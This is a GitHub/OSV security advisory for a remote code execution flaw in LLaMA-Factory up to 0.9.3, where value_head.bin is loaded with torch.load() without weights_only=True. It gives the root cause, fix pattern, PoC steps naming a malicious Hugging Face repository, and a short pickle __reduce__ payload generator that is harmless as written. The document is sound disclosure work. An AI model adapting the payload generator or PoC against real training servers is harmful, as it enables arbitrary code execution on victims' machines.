GHSA-xj56-p8mm-qmxj
Vulnerability from GitHub
Published: 2025-06-27 15:27
Modified: 2025-06-27 15:27
Summary: LLaMA-Factory allows Code Injection through improper vhead_file safeguards
Details

Summary

A critical remote code execution vulnerability was discovered in the LLaMA Factory training process. The vulnerability arises because the vhead_file is loaded without proper safeguards, allowing an attacker to execute arbitrary code on the host system simply by supplying a malicious Checkpoint path through the WebUI. The attack is stealthy: the victim remains unaware of the exploitation. The root cause is that the vhead_file is loaded via torch.load() without the safety parameter weights_only=True.

Note: In torch versions <2.6, the default setting is weights_only=False, and Llama Factory's setup.py only requires torch>=2.0.0.
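
A minimal sketch of the safer loading pattern, for illustration only (the helper name is hypothetical and this is not LLaMA-Factory's actual code):

    # Sketch of the fix pattern; the function name is hypothetical.
    import torch

    def load_value_head_state(vhead_file: str) -> dict:
        # weights_only=True restricts deserialization to tensors and primitive
        # containers and refuses arbitrary pickled objects. On torch < 2.6 the
        # default is weights_only=False, so it must be set explicitly.
        return torch.load(vhead_file, map_location="cpu", weights_only=True)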

Affected Version

Llama Factory versions <=0.9.3 are affected by this vulnerability.

Details

  1. In LLaMA Factory's WebUI, when a user sets the Checkpoint path, it modifies the adapter_name_or_path parameter passed to the training process (code in src/llamafactory/webui/runner.py; screenshot omitted).

  2. The adapter_name_or_path passed to the training process is then used in src/llamafactory/model/model_utils/valuehead.py to fetch the corresponding value_head.bin file from Hugging Face. This file is subsequently loaded via torch.load() without the security parameter weights_only=True being set, resulting in remote code execution (code in src/llamafactory/model/model_utils/valuehead.py; screenshot omitted; see the sketch below).
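
A simplified sketch of the vulnerable flow described in the two steps above; the function and variable names here are illustrative approximations, not the exact LLaMA-Factory source:

    # Illustrative sketch of the vulnerable code path; names are approximations.
    import torch
    from huggingface_hub import hf_hub_download

    V_HEAD_WEIGHTS_NAME = "value_head.bin"

    def load_valuehead_params(path_or_repo_id: str) -> dict:
        # path_or_repo_id comes from adapter_name_or_path, which the WebUI fills
        # from the user-supplied "Checkpoint path" -- it may point to an
        # attacker-controlled Hugging Face repository.
        vhead_file = hf_hub_download(repo_id=path_or_repo_id, filename=V_HEAD_WEIGHTS_NAME)
        # Vulnerable pattern: weights_only=True is not set, so on torch < 2.6
        # torch.load falls back to full pickle deserialization and executes any
        # code embedded in the downloaded file.
        return torch.load(vhead_file, map_location="cpu")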

PoC

Steps to Reproduce

  1. Deploy LLaMA Factory.
  2. Launch the remote attack through the WebUI interface:
    1. Configure Model name and Model path correctly. For demonstration purposes, we'll use a small model llamafactory/tiny-random-Llama-3 to accelerate model loading.
    2. Set Finetuning method to LoRA and Train Stage to Reward Modeling. The vulnerability is specifically triggered during the Reward Modeling training stage.
    3. Input a malicious Hugging Face path in Checkpoint path – here we use paulinsider/llamafactory-hack. This repository (https://huggingface.co/paulinsider/llamafactory-hack/tree/main) contains a malicious value_head.bin file. The generation method for this file is sketched after these steps (it can execute arbitrary attack commands; for demonstration, we configured it to create a HACKED! folder).
    4. Click Start to begin training. After a brief wait, a HACKED! folder will be created on the server. Note that arbitrary malicious code could be executed through this method.
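
The generation method referenced in step 3 relies on the standard pickle __reduce__ mechanism. The sketch below is an illustrative reconstruction, not the reporter's exact file, and uses a deliberately harmless payload (creating the HACKED! folder from the demonstration):

    # Illustrative sketch only: builds a value_head.bin whose unpickling runs a
    # harmless command. torch.load with weights_only=False executes __reduce__
    # payloads during deserialization.
    import os
    import torch

    class MaliciousValueHead:
        def __reduce__(self):
            # Called at load time on the victim machine; here it merely creates
            # a "HACKED!" directory, as in the demonstration.
            return (os.makedirs, ("HACKED!",))

    torch.save(MaliciousValueHead(), "value_head.bin")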

The video demonstration of the vulnerability exploitation is available at the Google Drive link: https://drive.google.com/file/d/1AddKm2mllsXfuvL4Tvbn_WJdjEOYXx4y/view?usp=sharing

Impact

Exploitation of this vulnerability allows remote attackers to:
  - Execute arbitrary malicious code / OS commands on the server.
  - Potentially compromise sensitive data or escalate privileges.
  - Deploy malware or create persistent backdoors in the system.

This significantly increases the risk of data breaches and operational disruption.

OSV advisory record from the source website:


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "llamafactory"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.9.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-53002"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-27T15:27:01Z",
    "nvd_published_at": "2025-06-26T15:15:23Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA critical remote code execution vulnerability was discovered during the Llama Factory training process. This vulnerability arises because the `vhead_file` is loaded without proper safeguards, allowing malicious attackers to execute arbitrary malicious code on the host system simply by passing a malicious `Checkpoint path` parameter through the `WebUI` interface. The attack is stealthy, as the victim remains unaware of the exploitation. The root cause is that the `vhead_file` argument is loaded without the secure parameter `weights_only=True`.\n\nNote: In torch versions \u003c2.6, the default setting is `weights_only=False`, and Llama Factory\u0027s `setup.py` only requires `torch\u003e=2.0.0`.\n\n### Affected Version\n\nLlama Factory versions \u003c=0.9.3 are affected by this vulnerability.\n\n### Details\n\n1. In LLaMA Factory\u0027s WebUI, when a user sets the `Checkpoint path`, it modifies the `adapter_name_or_path` parameter passed to the training process.\ncode in src/llamafactory/webui/runner.py\n\u003cimg width=\"1040\" alt=\"image-1\" src=\"https://github.com/user-attachments/assets/c8bc79e4-ce7d-43c9-b0fd-e37c235e6585\" /\u003e\n\n2. The `adapter_name_or_path` passed to the training process is then used in `src/llamafactory/model/model_utils/valuehead.py` to fetch the corresponding `value_head.bin` file from Hugging Face. This file is subsequently loaded via `torch.load()` without the security parameter `weights_only=True` being set, resulting in remote code execution.\ncode in src/llamafactory/model/model_utils/valuehead.py\n\u003cimg width=\"1181\" alt=\"image-2\" src=\"https://github.com/user-attachments/assets/6edbe694-0c60-4a54-bfb3-5e1042c9230d\" /\u003e\n\n### PoC\n\n#### Steps to Reproduce\n\n1. Deploy llama factory.\n2. Remote attack through the WebUI interface\n    1. Configure `Model name` and `Model path`  correctly. For demonstration purposes, we\u0027ll use a small model `llamafactory/tiny-random-Llama-3` to accelerate model loading.\n    2. Set `Finetuning method` to `LoRA` and `Train Stage` to `Reward Modeling`. The vulnerability is specifically triggered during the Reward Modeling training stage.\n    3. Input a malicious Hugging Face path in `Checkpoint path` \u2013 here we use `paulinsider/llamafactory-hack`. This repository(https://huggingface.co/paulinsider/llamafactory-hack/tree/main ) contains a malicious `value_head.bin` file. The generation method for this file is as follows (it can execute arbitrary attack commands; for demonstration, we configured it to create a `HACKED!` folder).\n    4. Click `Start` to begin training. After a brief wait, a `HACKED!` folder will be created on the server. Note that arbitrary malicious code could be executed through this method.\n\n**The video demonstration of the vulnerability exploitation is available at the** [Google Drive Link](https://drive.google.com/file/d/1AddKm2mllsXfuvL4Tvbn_WJdjEOYXx4y/view?usp=sharing) \n\n### Impact\nExploitation of this vulnerability allows remote attackers to:\n - Execute arbitrary malicious code / OS commands on the server.\n - Potentially compromise sensitive data or escalate privileges.\n - Deploy malware or create persistent backdoors in the system.\nThis significantly increases the risk of data breaches and operational disruption.",
  "id": "GHSA-xj56-p8mm-qmxj",
  "modified": "2025-06-27T15:27:02Z",
  "published": "2025-06-27T15:27:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-xj56-p8mm-qmxj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53002"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hiyouga/LLaMA-Factory/commit/bb7bf51554d4ba8432333c35a5e3b52705955ede"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hiyouga/LLaMA-Factory"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LLaMA-Factory allows Code Injection through improper vhead_file safeguards"
}

